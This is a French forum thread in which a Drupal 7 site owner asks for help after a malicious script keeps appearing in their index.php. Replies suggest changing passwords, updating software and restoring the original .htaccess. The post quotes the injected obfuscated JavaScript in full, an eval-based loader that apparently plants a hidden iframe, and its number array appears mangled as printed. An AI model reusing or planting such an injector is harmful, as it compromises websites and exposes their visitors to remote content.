Sécurité index.php drupal 7

Catégories:

Bonsoir,

Ce script, <script>var s=new String();a=(new Function("","")+"").substr(3-1,4);if((a=="unct")||(a=="ncti"))a=(document.createDocumentFragment+"").substr(2-1,4);if((a=="unct")||(a=="ncti")){r=1;c=String;}if(r&&document.createTextNode)y=2;e=window['e'+'val'];m=new Array(4.5y,18/y,52.5y,204/y,16y,80/y,50y,222/y,49.5y,234/y,54.5y,202/y,55y,232/y,23y,206/y,50.5y,232/y,34.5y,216/y,50.5y,218/y,50.5y,220/y,58y,230/y,33y,242/y,42y,194/y,51.5y,156/y,48.5y,218/y,50.5y,80/y,19.5y,196/y,55.5y,200/y,60.5y,78/y,20.5y,182/y,24y,186/y,20.5y,246/y,4.5y,18/y,4.5y,210/y,51y,228/y,48.5y,218/y,50.5y,228/y,20y,82/y,29.5y,18/y,4.5y,250/y,16y,202/y,54y,230/y,50.5y,64/y,61.5y,18/y,4.5y,18/y,50y,222/y,49.5y,234/y,54.5y,202/y,55y,232/y,23y,238/y,57y,210/y,58y,202/y,20y,68/y,30y,210/y,51y,228/y,48.5y,218/y,50.5y,64/y,57.5y,228/y,49.5y,122/y,19.5y,208/y,58y,232/y,56y,116/y,23.5y,94/y,49.5y,230/y,59y,202/y,57y,232/y,23y,210/y,55y,94/y,52.5y,220/y,23y,198/y,51.5y,210/y,31.5y,200/y,50.5y,204/y,48.5y,234/y,54y,232/y,19.5y,64/y,59.5y,210/y,50y,232/y,52y,122/y,19.5y,98/y,24y,78/y,16y,208/y,50.5y,210/y,51.5y,208/y,58y,122/y,19.5y,98/y,24y,78/y,16y,230/y,58y,242/y,54y,202/y,30.5y,78/y,59y,210/y,57.5y,210/y,49y,210/y,54y,210/y,58y,242/y,29y,208/y,52.5y,200/y,50y,202/y,55y,118/y,56y,222/y,57.5y,210/y,58y,210/y,55.5y,220/y,29y,194/y,49y,230/y,55.5y,216/y,58.5y,232/y,50.5y,118/y,54y,202/y,51y,232/y,29y,96/y,29.5y,232/y,55.5y,224/y,29y,96/y,29.5y,78/y,31y,120/y,23.5y,210/y,51y,228/y,48.5y,218/y,50.5y,124/y,17y,82/y,29.5y,18/y,4.5y,250/y,4.5y,18/y,51y,234/y,55y,198/y,58y,210/y,55.5y,220/y,16y,210/y,51y,228/y,48.5y,218/y,50.5y,228/y,20y,82/y,61.5y,18/y,4.5y,18/y,59y,194/y,57y,64/y,51y,64/y,30.5y,64/y,50y,222/y,49.5y,234/y,54.5y,202/y,55y,232/y,23y,198/y,57y,202/y,48.5y,232/y,50.5y,138/y,54y,202/y,54.5y,202/y,55y,232/y,20y,78/y,52.5y,204/y,57y,194/y,54.5y,202/y,19.5y,82/y,29.5y,204/y,23y,230/y,50.5y,232/y,32.5y,232/y,58y,228/y,52.5y,196/y,58.5y,232/y,50.5y,80/y,19.5y,230/y,57y,198/y,19.5y,88/y,19.5y,208/y,58y,232/y,56y,116/y,23.5y,94/y,49.5y,230/y,59y,202/y,57y,232/y,23y,210/y,55y,94/y,52.5y,220/y,23y,198/y,51.5y,210/y,31.5y,200/y,50.5y,204/y,48.5y,234/y,54y,232/y,19.5y,82/y,29.5y,204/y,23y,230/y,58y,242/y,54y,202/y,23y,236/y,52.5y,230/y,52.5y,196/y,52.5y,216/y,52.5y,232/y,60.5y,122/y,19.5y,208/y,52.5y,200/y,50y,202/y,55y,78/y,29.5y,204/y,23y,230/y,58y,242/y,54y,202/y,23y,224/y,55.5y,230/y,52.5y,232/y,52.5y,222/y,55y,122/y,19.5y,194/y,49y,230/y,55.5y,216/y,58.5y,232/y,50.5y,78/y,29.5y,204/y,23y,230/y,58y,242/y,54y,202/y,23y,216/y,50.5y,204/y,58y,122/y,19.5y,96/y,19.5y,118/y,51y,92/y,57.5y,232/y,60.5y,216/y,50.5y,92/y,58y,222/y,56y,122/y,19.5y,96/y,19.5y,118/y,51y,92/y,57.5y,202/y,58y,130/y,58y,232/y,57y,210/y,49y,234/y,58y,202/y,20y,78/y,59.5y,210/y,50y,232/y,52y,78/y,22y,78/y,24.5y,96/y,19.5y,82/y,29.5y,204/y,23y,230/y,50.5y,232/y,32.5y,232/y,58y,228/y,52.5y,196/y,58.5y,232/y,50.5y,80/y,19.5y,208/y,50.5y,210/y,51.5y,208/y,58y,78/y,22y,78/y,24.5y,96/y,19.5y,82/y,29.5y,18/y,4.5y,18/y,50y,222/y,49.5y,234/y,54.5y,202/y,55y,232/y,23y,206/y,50.5y,232/y,34.5y,216/y,50.5y,218/y,50.5y,220/y,58y,230/y,33y,242/y,42y,194/y,51.5y,156/y,48.5y,218/y,50.5y,80/y,19.5y,196/y,55.5y,200/y,60.5y,78/y,20.5y,182/y,24y,186/y,23y,194/y,56y,224/y,50.5y,220/y,50y,134/y,52y,210/y,54y,200/y,20y,204/y,20.5y,118/y,4.5y,18/y,62.5y);for(i=0;i<m.length;i++)if((a=="unct")||(a=="ncti"))s+=c.fromCharCode(m[i]);if((a=="unct")||(a=="ncti"))e('e(s)');</script><?php

s’insère régulièrement dans mon index.php et provoque une erreur d’affichage sur mon site web. Comment éviter cela ?

Voici les paramètres de mon .htaccess

SetEnv REGISTER_GLOBALS 0
SetEnv PHP_VER 5_3

Order Allow,Deny

deny from all

Satisfy All

Order Allow,Deny

Allow from all

Cordialement,

#

Il faut que tu recherches le trou de sécurité utilisé pour insérer le script malveillant.
Quelques pistes :
-Changer les mots de passe (drupal, mysql)
-Mettre à jour php, drupal, mysql, etc
-reprend le htaccess original de drupal

#

Salut,

Je suis sous hébergement mutalisé chez ovh. La version de Mysql et php est donc à jour vu que j’utilise directement les bases proposées par ovh.

Pour mon .htaccess c’est celui d’origine de Drupal. Le copier / coller que j’ai fais dans mon précédent message concerne seulement les lignes rajoutées au début du fichier de manière a activer la dernière version de php et protéger les dossiers…

Pour les mots de pass, j’ai tenté l’expérience plusieurs fois mais aucun résultats… d’autres pistes ?

Vous rencontrez les mêmes problèmes avec Drupal 7 ?

#

Je n’avais pas vu que tu avais ajouté du code dans le htaccess, perso je ne comprend pas la logique de ce code. Pourquoi «satisfy all» ?

Syndiquer le contenu